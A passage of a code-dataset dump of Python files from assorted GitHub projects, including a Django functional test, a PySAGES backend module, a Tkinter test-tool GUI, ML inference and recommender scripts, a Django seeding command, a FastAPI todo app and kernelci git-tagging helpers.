to-do item'\n )\n\n # 她在一个文本框中输入了“Buy peacock feathers”(购买孔雀羽毛)\n # 伊迪丝的爱好是使用假蝇做饵钓鱼\n inputbox.send_keys('Buy peacock feathers')\n\n # 她按回车键后,页面更新了\n inputbox.send_keys(Keys.ENTER)\n \n # 待办事项表格中显示了“1: Buy peacock feathers”\n self.check_for_row_in_list_table('1: Buy peacock feathers')\n\n\n # 页面中又显示了一个文本框,可以输入其他的待办事项\n # 她输入了“Use peacock feathers to make a fly”(使用孔雀羽毛做假蝇)\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('Use peacock feathers to make a fly')\n inputbox.send_keys(Keys.ENTER)\n # 伊迪丝做事很有条理\n\n # 页面再次更新,她的清单中显示了这两个待办事项\n self.check_for_row_in_list_table('1: Buy peacock feathers')\n self.check_for_row_in_list_table('2: Use peacock feathers to make a fly')\n \n self.fail('Finish the test!')\n \n # 伊迪丝想知道这个网站是否会记住她的清单\n\n # 她看到网站为她生成了一个唯一的URL\n # 而且页面中有一些文字解说这个功能\n\n # 她访问那个URL,发现她的待办事项列表还在\n\n # 她很满意,去睡觉了\n\n\nif __name__ == '__main__': #➐\n unittest.main(warnings='ignore') #➑\n","repo_name":"TarriMorko/django_tdd","sub_path":"superlists/functional_test.py","file_name":"functional_test.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4441639576","text":"# SPDX-License-Identifier: MIT\n# See LICENSE.md and CONTRIBUTORS.md at https://github.com/SSAGESLabs/PySAGES\n\nfrom importlib import import_module\n\nfrom pysages.typing import Any, Callable, JaxArray, NamedTuple, Optional\n\nJaxMDState = Any\n\n\nclass JaxMDContextState(NamedTuple):\n \"\"\"\n Provides an interface for the data structure returned by `JaxMDContext.init_fn` and\n expected as the single argument of `JaxMDContext.step_fn`.\n\n Arguments\n ---------\n state: JaxMDState\n Holds the particle information and corresponds to the internal state of\n `jax_md.simulate` methods.\n\n extras: Optional[dict]\n Additional arguments required by `JaxMDContext.step_fn`, these might include for\n instance, the neighbor list or the time step.\n \"\"\"\n\n state: JaxMDState\n extras: Optional[dict]\n\n\nclass JaxMDContext(NamedTuple):\n \"\"\"\n Provides an interface for the data structure expects from `generate_context` for\n `jax_md`-backed simulations.\n\n Arguments\n ---------\n init_fn: Callable[..., JaxMDContextState]\n Initilizes the `jax_md` state. Generally, this will be the `init_fn` of any\n of the simulation routines in `jax_md` (or wrappers around these).\n\n step_fn: Callable[..., JaxMDContextState]\n Takes a state and advances a `jax_md` simulation by one step. Generally, this\n will be the `apply_fn` of any of the simulation routines in `jax_md` (or wrappers\n around these).\n\n box: JaxArray\n Affine transformation from a unit hypercube to the simulation box.\n\n dt: float\n Step size of the simulation.\n \"\"\"\n\n init_fn: Callable[..., JaxMDContextState]\n step_fn: Callable[..., JaxMDContextState]\n box: JaxArray\n dt: float\n\n\nclass SamplingContext:\n \"\"\"\n PySAGES simulation context. Manages access to the backend-dependent simulation context.\n \"\"\"\n\n def __init__(\n self,\n sampling_method,\n context_generator: Callable,\n callback: Optional[Callable] = None,\n context_args: dict = {},\n **kwargs,\n ):\n \"\"\"\n Automatically identifies the backend and binds the sampling method to\n the simulation context.\n \"\"\"\n self._backend_name = None\n context = context_generator(**context_args)\n module_name = type(context).__module__\n\n if module_name.startswith(\"ase.md\"):\n self._backend_name = \"ase\"\n elif module_name.startswith(\"hoomd\"):\n self._backend_name = \"hoomd\"\n elif isinstance(context, JaxMDContext):\n self._backend_name = \"jax-md\"\n elif module_name.startswith(\"lammps\"):\n self._backend_name = \"lammps\"\n elif module_name.startswith(\"simtk.openmm\") or module_name.startswith(\"openmm\"):\n self._backend_name = \"openmm\"\n\n if self._backend_name is None:\n backends = \", \".join(supported_backends())\n raise ValueError(f\"Invalid backend {module_name}: supported options are ({backends})\")\n\n self.context = context\n self.method = sampling_method\n self.view = None\n self.run = None\n\n backend = import_module(\".\" + self._backend_name, package=\"pysages.backends\")\n self.sampler = backend.bind(self, callback, **kwargs)\n\n # `self.view` and `self.run` *must* be set by the backend bind function.\n assert self.view is not None\n assert self.run is not None\n\n @property\n def backend_name(self):\n return self._backend_name\n\n def __enter__(self):\n \"\"\"\n Trampoline 'with statements' to the wrapped context when the backend supports it.\n \"\"\"\n if hasattr(self.context, \"__enter__\"):\n return self.context.__enter__()\n return self.context\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n \"\"\"\n Trampoline 'with statements' to the wrapped context when the backend supports it.\n \"\"\"\n if hasattr(self.context, \"__exit__\"):\n self.context.__exit__(exc_type, exc_value, exc_traceback)\n\n\ndef supported_backends():\n return (\"ase\", \"hoomd\", \"jax-md\", \"lammps\", \"openmm\")\n","repo_name":"SSAGESLabs/PySAGES","sub_path":"pysages/backends/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"18"} +{"seq_id":"41027436589","text":"import datetime\nimport os\nfrom tkinter.font import BOLD\n\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter import (\n ttk, Frame, BOTH, NW, YES, HORIZONTAL, SE, TOP, NORMAL, END, DISABLED)\n\nfrom conf.configuration import (\n DETERMINATE, INFO, WARN, ERROR, BLACK, GOLDENROD, RED,\n INDETERMINATE, LINUX_OS, WM_DELETE_WINDOW,\n VALUE, SELECT_USE_CONF_LABEL,\n NOT_SELECTED_ANACONDA_MSG, CREATE_ENV_MSG,\n CANCEL_MSG, ANACONDA_DIR, TOOL_NAME, DATA_SCRIPT_LABEL, MODEL_SCRIPT_LABEL,\n TEST_FUNC_LABEL, CONSOLE_FONT_NAME)\n\nfrom src.com.common import (\n cmd_exec_run_posix, show_wizard, get_geometry, create_env,\n create_test_exec_script, save_config, stop_cmd)\nfrom src.gui.main_menu import MainMenu\nfrom src.gui.test_select_frame import TestSelectFrame\nfrom src.gui.wizard.conf_select_wizard import ConfSelectWizard\nfrom src.info.env_setup_info import EnvSetupInfo\n\n\nclass MainWindow(Frame):\n\n def __init__(self, root=None, width=0.6, height=0.75, size=10,\n use_factor=True):\n self.__root = root\n Frame.__init__(self, self.__root)\n # MainWindow size\n w, h, x, y = get_geometry(self, width, height, use_factor)\n\n self.__root.geometry('%dx%d+%d+%d' % (w, h, x, y))\n self.__root.minsize(int(w), int(h))\n self.lift()\n\n self.__test_select_frame = TestSelectFrame(self)\n self.__test_select_frame.pack(fill=BOTH, anchor=NW, expand=YES,\n padx=5, pady=5)\n\n # console\n self.__console = ScrolledText(self, font=(CONSOLE_FONT_NAME, size),\n height=1)\n self.__console.configure(state=DISABLED)\n self.__console.pack(fill=BOTH, anchor=NW, expand=YES, padx=5, pady=5)\n\n # Progressbar\n self.__pg_bar = ttk.Progressbar(self, orient=HORIZONTAL,\n mode=DETERMINATE)\n self.__pg_bar.configure(maximum=100, value=0)\n self.__pg_bar.pack(anchor=SE, padx=5, pady=5)\n\n self.__root.title(TOOL_NAME)\n\n self.pack(side=TOP, fill=BOTH, expand=YES)\n\n self.__main_menu = MainMenu(self.__root)\n self.__root.configure(menu=self.__main_menu)\n\n # Console output color\n self.__console.tag_configure(INFO, foreground=BLACK,\n font=(CONSOLE_FONT_NAME, size))\n self.__console.tag_configure(WARN, foreground=GOLDENROD,\n font=(CONSOLE_FONT_NAME, size))\n self.__console.tag_configure(ERROR, foreground=RED,\n font=(CONSOLE_FONT_NAME, size, BOLD))\n\n self.is_running = False\n self.__root.protocol(WM_DELETE_WINDOW, self.__close)\n\n self.__user = TOOL_NAME\n\n def __close(self):\n if not self.is_running:\n self.pg_bar_stop()\n self.__root.destroy()\n\n def c_println(self, str_val='', mode='normal'):\n self.__console.configure(state=NORMAL)\n\n split_val = str_val.splitlines()\n for index, value in enumerate(split_val):\n # When it exceeds the maximum line,\n # it deletes it from the first line\n if len(self.__console.get('1.0', END).splitlines()) > 1024 * 4:\n # Delete First Line\n self.__console.delete('1.0', '1.end')\n # Delete Line Feed\n self.__console.delete('1.0')\n\n # Insert New Line\n if index is 0:\n if mode == 'normal':\n self.__console.insert(\n END, '%s : [%s]' % (datetime.datetime.now(),\n self.__user), mode)\n\n else:\n self.__console.insert(\n END,\n '%s : [%s] [%s] ' % (datetime.datetime.now(),\n self.__user, mode.upper()), mode)\n\n self.__console.insert(END, '%s%s' % (value, os.linesep), mode)\n\n self.__console.see(END)\n self.update()\n\n self.__console.configure(state=DISABLED)\n\n @property\n def test_select_frame(self):\n return self.__test_select_frame\n\n @test_select_frame.deleter\n def test_select_frame(self):\n del self.__test_select_frame\n\n @property\n def console(self):\n return self.__console\n\n @console.deleter\n def console(self):\n del self.__console\n\n @property\n def pg_bar(self):\n return self.__pg_bar\n\n @pg_bar.deleter\n def pg_bar(self):\n del self.__pg_bar\n\n def pg_bar_start(self):\n self.__pg_bar.configure(mode=INDETERMINATE)\n self.__pg_bar.start(20)\n\n def pg_bar_stop(self):\n self.__pg_bar.stop()\n self.__pg_bar.configure(mode=DETERMINATE)\n self.__pg_bar[VALUE] = 0\n\n def test_func_run(self):\n # Check anaconda\n if ANACONDA_DIR is None:\n self.c_println(NOT_SELECTED_ANACONDA_MSG, ERROR)\n return\n\n select_test_func_list = self.__test_select_frame.get_select_test_func()\n select_model_list = self.__test_select_frame.get_select_model()\n select_data_list = self.__test_select_frame.get_select_data()\n\n if len(select_test_func_list) > 0 and len(select_model_list) > 0:\n # Treeview selectmode is BROWSE\n test_func = select_test_func_list[0]\n self.c_println('%s : %s' % (TEST_FUNC_LABEL, test_func.abs_path),\n mode=INFO)\n\n if select_data_list:\n data_script = select_data_list[0]\n self.c_println('%s : %s' % (DATA_SCRIPT_LABEL,\n data_script.abs_path), mode=INFO)\n else:\n data_script = None\n\n model_script = select_model_list[0]\n self.c_println('%s : %s' % (MODEL_SCRIPT_LABEL,\n model_script.abs_path), mode=INFO)\n\n # select confing\n conf_select_wizard = ConfSelectWizard(\n master=self.master, conf_path=test_func.conf_path)\n\n show_wizard(title=SELECT_USE_CONF_LABEL, wizard=conf_select_wizard)\n if not conf_select_wizard.is_run:\n self.c_println(CANCEL_MSG, mode=INFO)\n return\n\n test_func.conf_path = conf_select_wizard.conf_path\n\n # Save config\n save_config()\n\n if test_func.conf_path:\n self.c_println('Configuration : %s' % test_func.conf_path,\n mode=INFO)\n else:\n self.c_println('Not used configuration file', mode=INFO)\n\n # Create Execute Environment\n env_setup = EnvSetupInfo.get_data(test_func.env_id)\n\n env_python_dir = self.__create_env(script_path=env_setup.abs_path)\n\n if not env_python_dir:\n self.c_println(CANCEL_MSG, mode=INFO)\n return\n\n self.c_println('Execute Env : %s' % env_python_dir,\n mode=INFO)\n\n # template python file replace keyword\n # Created file is deleted after execution\n exec_path = create_test_exec_script(\n test_func=test_func,\n data=data_script,\n model=model_script,\n print_func=self.c_println)\n\n if exec_path:\n # Run Test Execute Function\n try:\n self.__call_test_func(\n test_func=test_func,\n env_python_dir=env_python_dir,\n test_func_script_path=exec_path)\n\n finally:\n os.remove(exec_path)\n\n def __create_env(self, script_path):\n # Format of Setup script(sh or bat)\n # Search env name after execute setup script\n # (search 'conda create or python venv')\n # return env directory\n # (AnacondaDir/envs/env_name/bin or AnacondaDir/envs/env_name)\n self.c_println(CREATE_ENV_MSG, mode=INFO)\n self.pg_bar_start()\n\n # Search Env Name\n try:\n ret_dir = create_env(script_path, self)\n\n except Exception as e:\n self.c_println(os.linesep + str(e), ERROR)\n return None\n\n finally:\n self.pg_bar_stop()\n\n return ret_dir\n\n def __call_test_func(self, test_func, env_python_dir,\n test_func_script_path):\n\n self.c_println('Test Function Start ( %s )' % test_func.abs_path,\n mode=INFO)\n self.pg_bar_start()\n\n # Execute environment Python and Script\n cmd = [os.path.join(env_python_dir, 'python'),\n '-u',\n test_func_script_path]\n\n ret = False\n try:\n # Execute Script\n self.__user = 'Test ID %d' % test_func.id\n if os.name == LINUX_OS:\n ret = cmd_exec_run_posix(command=cmd, main_window=self,\n cwd=test_func.dir_path)\n else:\n ret = False\n\n except Exception as e:\n self.c_println(os.linesep + str(e), ERROR)\n\n finally:\n self.__user = TOOL_NAME\n self.pg_bar_stop()\n\n if ret:\n self.c_println('Test Function Complete', mode=INFO)\n else:\n self.c_println('Test Function Failed', mode=INFO)\n\n return ret\n\n def stop_test_func(self):\n if stop_cmd():\n self.c_println('Stop!!', WARN)\n","repo_name":"tshoang/deep_saucer","sub_path":"deep_saucer_core/src/gui/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13380517649","text":"import os\nimport time\nimport sys\nimport traceback\n\nimport cv2\nimport torch\nimport torch.nn as nn\nimport timm\n\nimport numpy as np\n\nfrom models.build_model import build_model\nfrom data.datasets import build_test_loader\nfrom collections import OrderedDict\n\n\ndef main(args):\n \n print(\"Creating data loaders\")\n test_dataloader = build_test_loader(args.test_path, args.input_size, args.batch_size, args.num_workers)\n \n classes = torch.load(args.checkpoint)['classes']\n #print(classes)\n\n if args.hub == 'tv':\n model = build_model(args.net, pretrained=False, fine_tune=False, num_classes=len(classes))\n elif args.hub == 'timm':\n model = timm.create_model(args.net, pretrained=False, num_classes=len(classes))\n else:\n raise NameError('Model hub only support tv or timm')\n # support multi gpu\n model = nn.DataParallel(model)#, device_ids=args.device)\n model.load_state_dict(torch.load(args.checkpoint)['model_state_dict'])\n model.cuda()\n\n model.eval()\n\n epoch_data_len = len(test_dataloader.dataset)\n batch_num = len(test_dataloader)\n\n bg_time = time.time()\n with torch.no_grad():\n for images, img_path in test_dataloader:\n try:\n input = images.cuda()\n output = model(input) #[batch_size, len(classes)]\n\n indexes = output.detach().cpu().numpy().argmax(1)\n for i, index in enumerate(indexes):\n print('{}\\t{}\\t{}'.format(img_path[i], classes[index], index))\n sys.stdout.flush()\n\n except:\n #print(image)\n traceback.print_exc()\n\n total_time = time.time() - bg_time\n print('Total used time:{}, Avg used time:{}'.format(total_time, {total_time/epoch_data_len*batch_num}))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='PyTorch Classification Batch Inference')\n\n parser.add_argument('--test-path', default='./data/beauty', help='dataset')\n parser.add_argument('--hub', default='tv', help='model hub, from torchvision(tv) or timm')\n parser.add_argument('--net', default='resnet50', help='model name')\n parser.add_argument('--device', default=[0], help='device')\n parser.add_argument('-b', '--batch-size', default=32, type=int)\n parser.add_argument('-j', '--num-workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 8)')\n parser.add_argument('--checkpoint', default='./checkpoints/model_2_600.pth', help='checkpoint')\n parser.add_argument('--input-size', default=224, type=int, help='size of input')\n\n args = parser.parse_args()\n\n print(args)\n main(args)\n","repo_name":"mxer/ImageClassificationTemplate","sub_path":"inference_multi_gpu.py","file_name":"inference_multi_gpu.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22558168186","text":"import pandas as pd\nfrom sklearn.feature_extraction import text\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# reading the lyrics csv file\n# erroe_bad_lines will skip the rows with missing and damaged values\npath = \"azlyrics_lyrics_b.csv\"\nlyrics = pd.read_csv(\"azlyrics_lyrics_b.csv\", error_bad_lines=False)\n\n# extracting the lyrics from the file into a list\n\nText = lyrics['LYRICS'].tolist()\n\n# vectorize the lyrics using scikit learn\n# removing the stopwords\n\ntfidf = text.TfidfVectorizer(input=Text, stop_words=\"english\")\n\n# standardize the score (zero mean and unit standard error)\n\nmatrix = tfidf.fit_transform(Text)\n\n# printing the size of the vectors\n# output = (no.of.rows in the dataset, no.of unique words in the dataset)\n\nprint(\"VECTOR MATRIX\")\nprint(matrix.shape)\n\n# finding the similar song based on the word of the lyrics using cosine similarity\n\nsimilar_titles = cosine_similarity(matrix)\n\n\n# function to return the \"4\" most similar song titles based on cosine similarity\n\ndef get_similar_articles(x):\n return \"_\".join(lyrics['SONG_NAME'].loc[x.argsort()[-5:-1]])\n\n\n# calling the function to return the similar songs\n\nlyrics['similar_titles'] = [get_similar_articles(x) for x in similar_titles]\n\n# getting the songs and similar titles\n\nheader = [\"SONG_NAME\", \"similar_titles\"]\n\n# writing the result to csv file\nop = \"export_B_RECOMMENDATION.csv\"\nlyrics.to_csv(op, columns=header)\n\n# test cases\n\nfor x in range(0, 100):\n print(\"\\nTest case %d\" % x)\n print(\"Song Name: %s\" % lyrics['SONG_NAME'].str.replace(\"_\", \" \").str.upper().str.strip()[x])\n print(\"Recommendation: %s\" %\n lyrics['similar_titles'].str.replace(\"_\", \"\\n\").str.upper().str.strip().str.split(\"\\n\")[x])\n","repo_name":"anand-surya/ISTE-612-Project","sub_path":"recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12149277673","text":"from django.core.management.base import BaseCommand\nimport pandas as pd\nfrom hotels.models import Hotel, Amenity, Room, HotelImages, Review, FAQ, HouseRules\nimport random\nimport os\nfrom django.core.files import File\nfrom account_manager.models import User\nfrom faker import Faker\nimport shutil\n\n\nclass Command(BaseCommand):\n help = \"Import data from CSV file\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"path\", type=str, help=\"Path to CSV file\")\n\n def handle(self, *args, **kwargs):\n fake = Faker()\n # fake.seed(4321)\n path = kwargs[\"path\"]\n room_types = set()\n df = pd.read_csv(path)\n hotel_names = set()\n\n for _, row in df.iterrows():\n room_type = [\n room\n for room in str(row[\"Tags\"]).strip(\"[]\").split(\",\")\n if \"Room\" in room\n ]\n\n if len(room_type) > 0:\n if room_type[0] not in room_types:\n # the room_type[0] is of the form ' 'Room' '\n room_type = room_type[0].strip(\"' \")\n room_types.add(room_type)\n room_types = list(room_types)\n price_map = {}\n\n for each in room_types:\n price_map[each] = random.randint(300, 1500)\n\n for _, row in df.iterrows():\n if (\n row[\"Hotel_Name\"] in hotel_names\n ): # check if the hotel name already exists\n continue\n hotel_names.add(row[\"Hotel_Name\"]) # add the hotel name to the set\n hotel = Hotel.objects.create(\n name=row[\"Hotel_Name\"],\n address=row[\"Hotel_Address\"],\n room_count=random.randint(1, 11),\n hotel_score=row[\"Average_Score\"],\n lat=row[\"lat\"] if type(row[\"lat\"]) == float else 0.0,\n lng=row[\"lng\"] if type(row[\"lng\"]) == float else 0.0,\n approved=True,\n )\n for i in range(1, random.randint(8, 20)):\n amenity = Amenity.objects.get(id=random.randint(1, 70))\n hotel.amenities.add(amenity)\n\n hotel_image_path = \"hotel_images/\"\n hotel_image_filename = random.choice(os.listdir(hotel_image_path))\n hotel_image = HotelImages.objects.create(\n hotel=hotel, image=hotel_image_path + hotel_image_filename\n )\n hotel_image.image.save(\n hotel_image_filename,\n File(open(hotel_image_path + hotel_image_filename, \"rb\")),\n )\n faq_questions = [\n \"What is your return policy?\",\n \"What are your shipping options?\",\n \"How do I track my order?\",\n \"Do you offer gift cards?\",\n \"What payment methods do you accept?\",\n ]\n\n for question in faq_questions:\n answer = fake.text(max_nb_chars=200)\n\n faq = FAQ.objects.create(\n hotel=hotel,\n question=question,\n answer=answer,\n )\n faq.save()\n\n house_rule = HouseRules.objects.create(\n hotel=hotel,\n smoking_allowed=random.choice([True, False]),\n pets_allowed=random.choice([True, False]),\n parties_allowed=random.choice([True, False]),\n self_check_in=random.choice([True, False]),\n )\n house_rule.save()\n\n room_images_path = \"room_images/\"\n room_images = os.listdir(room_images_path)\n\n for i in range(1, hotel.room_count + 1):\n random_room_type = room_types[random.randint(0, len(room_types) - 1)]\n room_image_filename = random.choice(room_images)\n room_image_path = os.path.join(room_images_path, room_image_filename)\n\n # create a new unique file name for the image\n room_image_newname = f\"{hotel}_{i}.jpg\"\n\n # copy the image to the media folder and rename it\n\n # create a new room object and set its image field\n room = Room.objects.create(\n hotel=hotel,\n room_type=random_room_type,\n price=price_map[random_room_type],\n quantity=random.randint(1, 10),\n )\n room.image.save(room_image_newname, File(open(room_image_path, \"rb\")))\n room.save()\n users = []\n for i in range(1, 51):\n name = fake.name().split()\n first_name = name[0]\n last_name = name[1]\n email = fake.ascii_free_email()\n gender = random.choice([\"Male\", \"Female\", \"Others\"])\n country = random.choice(df[\"Reviewer_Nationality\"].unique())\n user = User.objects.create(\n first_name=first_name,\n last_name=last_name,\n email=email,\n gender=gender,\n country=country,\n is_active=True,\n )\n user.set_password(\"user123\")\n user.save()\n users.append(user)\n\n for user in users:\n for i in range(random.randint(1, 4)):\n hotel = random.choice(Hotel.objects.all())\n rooms = Room.objects.filter(hotel=hotel)\n if rooms:\n room = random.choice(rooms)\n found_hotel = df.loc[df[\"Hotel_Name\"] == hotel.name]\n\n Review.objects.create(\n user=user,\n hotel=hotel,\n room=room,\n score=found_hotel[\"Reviewer_Score\"].iloc[0],\n review=found_hotel[\"Positive_Review\"].iloc[0]\n + found_hotel[\"Negative_Review\"].iloc[0],\n stay_duration=random.randint(1, 10),\n )\n else:\n pass\n","repo_name":"OzoneBht1/Hotel_Booking_System","sub_path":"backend/hotels/management/commands/populateModels.py","file_name":"populateModels.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"10513531791","text":"from collections import Counter\nfrom enum import Enum\n\n\nclass Pixel(Enum):\n BLACK = '0'\n WHITE = '1'\n TRANSPARENT = '2'\n\n\nclass Image():\n def __init__(self, width, height, data=None):\n self.width = width\n self.height = height\n self.layers = []\n self.data = [Pixel.TRANSPARENT] * (width * height)\n if data:\n self.add_layer(data)\n\n def add_layer(self, layer):\n layer = [Pixel(pixel) for pixel in layer]\n self.layers.append(layer)\n for index, pixel in enumerate(layer):\n if self.data[index] == Pixel.TRANSPARENT:\n self.data[index] = pixel\n\n def show(self):\n image_rows = [self.data[i:i+self.width] for i in range(0, len(self.data), self.width)]\n\n for row in image_rows:\n for pixel in row:\n if pixel == Pixel.BLACK:\n print(' ', end='')\n elif pixel == Pixel.WHITE:\n print('#', end='')\n else:\n print('?', end='')\n print('')\n\n\ndef main():\n with open('day08/input') as file:\n data = list(file.read())[:-1]\n\n print(data)\n dimensions = 25 * 6\n print(f'{len(data)} / {dimensions} = {len(data) / (dimensions)}')\n\n layers = [data[i:i+dimensions] for i in range(0, len(data), dimensions)]\n\n print(layers[0])\n print(len(layers[0]))\n\n counters = [Counter(layer) for layer in layers]\n\n num_zeros = 200\n best_index = None\n\n for index, counter in enumerate(counters):\n if num_zeros > counter['0']:\n num_zeros = counter['0']\n best_index = index\n\n answer = counters[best_index]\n\n print(answer['1'] * answer['2'])\n\n\ndef main2():\n width, height = 25, 6\n with open('day08/input') as file:\n # data = [Pixel(pixel) for pixel in (file.read()) if pixel != '\\n']\n data = list(file.read())[:-1]\n\n dimensions = width * height\n\n layers = [data[i:i+dimensions] for i in range(0, len(data), dimensions)]\n\n image = Image(width=25, height=6)\n\n for layer in layers:\n image.add_layer(layer)\n\n image.show()\n\n\nif __name__ == \"__main__\":\n main()\n main2()\n","repo_name":"paul-schwendenman/advent-of-code-2019","sub_path":"day08/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74456283560","text":"from fastapi import FastAPI, Request\nfrom fastapi.responses import RedirectResponse, FileResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom starlette import status\n\nimport driver_database as dd\n\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\napp.mount('/static', StaticFiles(directory='static'), name='static')\n\n\napp.get('/favicon.ico', include_in_schema=False)\nasync def favicon():\n return FileResponse(\"/static/image/favicon.ico\")\n\n\n@app.get('/')\nasync def root(request: Request):\n data = await dd.get_data()\n\n return templates.TemplateResponse(\n name=\"root.html\",\n context={\"request\": request, \"tododict\": data},\n status_code=status.HTTP_200_OK\n )\n\n\n@app.get(\"/delete/{id}\")\nasync def delete_todo(request: Request, id: str):\n data = await dd.get_data()\n del data[id]\n await dd.write_data(data=data)\n\n return RedirectResponse(\n url=\"/\",\n status_code=status.HTTP_307_TEMPORARY_REDIRECT\n )\n\n\n@app.post(\"/add\")\nasync def add_todo(request: Request):\n data = await dd.get_data()\n newdata = dict()\n i = 1\n for id in data:\n newdata[str(i)] = data[id]\n i += 1\n formdata = await request.form()\n newdata[str(i)] = formdata[\"newtodo\"]\n\n await dd.write_data(newdata)\n\n return RedirectResponse(\n url=\"/\",\n status_code=status.HTTP_303_SEE_OTHER\n )\n","repo_name":"mertwec/notes_todo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11500412015","text":"import configparser\nimport datetime\nimport github\nimport os\nimport re\nimport subprocess\n\n# Mainline kernel URL from torvalds\nTORVALDS_GIT_URL = \\\n \"git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git\"\n\n# Terminal colors...\nCOLORS = {\n 'green': '\\033[92m',\n 'yellow': '\\033[93m',\n 'red': '\\033[91m',\n 'blue': '\\033[94m',\n 'clear': '\\033[0m',\n}\n\n# Github API handler\nGITHUB = github.Github()\n\n\ndef print_color(color, msg):\n print(''.join([COLORS[color], msg, COLORS['clear']]))\n\n\ndef shell_cmd(cmd):\n return subprocess.check_output(cmd, shell=True).decode()\n\n\ndef default_ssh_key(ssh_key, branch):\n if ssh_key:\n return ssh_key\n\n ssh_key_name = '_'.join(['id_rsa', branch])\n ssh_key_path = os.path.join('keys', ssh_key_name)\n if os.path.exists(ssh_key_path):\n return ssh_key_path\n\n return None\n\n\ndef ssh_agent(ssh_key, cmd):\n if ssh_key:\n cmd = \"ssh-agent sh -c 'ssh-add {key}; {cmd}'\".format(\n key=ssh_key, cmd=cmd)\n shell_cmd(cmd)\n\n\ndef date_tag(path, px, fmt=\"%Y%m%d\"):\n tag_name = \"{}{}\".format(px, datetime.date.today().strftime(fmt))\n try:\n n = int(shell_cmd(\"\"\"\ncd {path}\ngit fetch --quiet --tags origin\ngit tag -l | grep -c {tag}\n\"\"\".format(path=path, tag=tag_name)))\n except subprocess.CalledProcessError:\n n = 0\n tag_name = '.'.join([tag_name, str(n)])\n return tag_name\n\n\ndef create_tag(path, tag):\n shell_cmd(\"\"\"\\\ncd {path}\ngit tag -l | grep {tag} && git tag -d {tag}\ngit tag -a {tag} -m {tag}\n\"\"\".format(path=path, tag=tag))\n return tag\n\n\ndef list_tags(path, pattern='^.*'):\n shell_cmd(\"\"\"\\\ncd {path}\ngit tag -l | grep -e '{pattern}' | xargs git tag -d\ngit fetch -q --tags origin\n\"\"\".format(path=path, pattern=pattern))\n cmd = \"cd {path}; git tag -l | grep -e '{pattern}'\".format(\n path=path, pattern=pattern\n )\n tags = sorted(shell_cmd(cmd).split())\n return tags\n\n\ndef delete_tags(path, tags, ssh_key):\n slices = []\n index = 0\n n_tags = len(tags)\n slice_max_len = 100\n while index != n_tags:\n slice_len = min((n_tags - index), slice_max_len)\n slices.append(tags[index:index+slice_len])\n index += slice_len\n for tags_slice in slices:\n tags_str = ' '.join(tags_slice)\n print(\"Deleting {}\".format(tags_str))\n cmd = \"cd {}; echo {} | xargs git tag -d\".format(path, tags_str)\n shell_cmd(cmd)\n tags_push_str = ' :'.join(tags_slice)\n cmd = \"cd {}; echo :{} | xargs git push origin\".format(\n path, tags_push_str)\n ssh_agent(ssh_key, cmd)\n\n\ndef delete_old_tags(args, path, ssh_key):\n tags = list_tags(path, args.tag_prefix + \"*\")\n if len(tags) > args.tag_limit:\n limit = args.tag_limit * -1\n to_delete = tags[:limit]\n print(\"Deleting {} tags: {}{}\".format(\n len(to_delete), to_delete[0],\n \"...{}\".format(to_delete[-1]) if len(to_delete) > 1 else \"\"))\n delete_tags(path, to_delete, ssh_key)\n\n\ndef checkout_repository(path, repo, origin=\"origin\", branch=\"main\"):\n if not os.path.exists(path):\n shell_cmd(\"\"\"\\\ngit clone {url} {path}\ncd {path}\ngit remote set-url --push origin {push}\n\"\"\".format(path=path, url=repo.clone_url, push=repo.ssh_url))\n\n shell_cmd(\"\"\"\\\ncd {path}\ngit reset --quiet --hard --merge\ngit fetch --quiet {origin} {branch}\ngit checkout FETCH_HEAD\ngit config user.name \"kernelci.org bot\"\ngit config user.email \"bot@kernelci.org\"\n\"\"\".format(path=path, origin=origin, branch=branch))\n\n\ndef origin_diff(path, branch):\n shell_cmd(\"\"\"\\\ncd {path}\ngit remote update origin\n\"\"\".format(path=path))\n diff = shell_cmd(\"\"\"\\\ncd {path}\ngit diff origin/{branch}..HEAD\n\"\"\".format(path=path, branch=branch))\n return diff\n\n\ndef _find_patches(path):\n patches_re = re.compile('.*\\.(patch|mbx)$')\n for root, dirs, files in os.walk(path):\n for file_name in files:\n if patches_re.match(file_name):\n yield os.path.join(root, file_name)\n\n\ndef apply_patches(path, patches_path):\n patches = list(sorted(_find_patches(patches_path)))\n for patch in patches:\n print(\"Applying patch: {}\".format(patch))\n try:\n shell_cmd(\"\"\"\\\ncat {patch} | (cd {path} && git am)\n\"\"\".format(path=path, patch=patch))\n except subprocess.CalledProcessError:\n print(\"WARNING: Failed to apply patch\")\n shell_cmd(\"\"\"\\\ncd {path}\ngit am --abort\n\"\"\".format(path=path))\n return False\n return True\n\n\ndef push_tag_and_branch(path, ssh_key, branch, tag):\n ssh_agent(ssh_key, \"\"\"\\\ncd {path}\ngit push --quiet --force 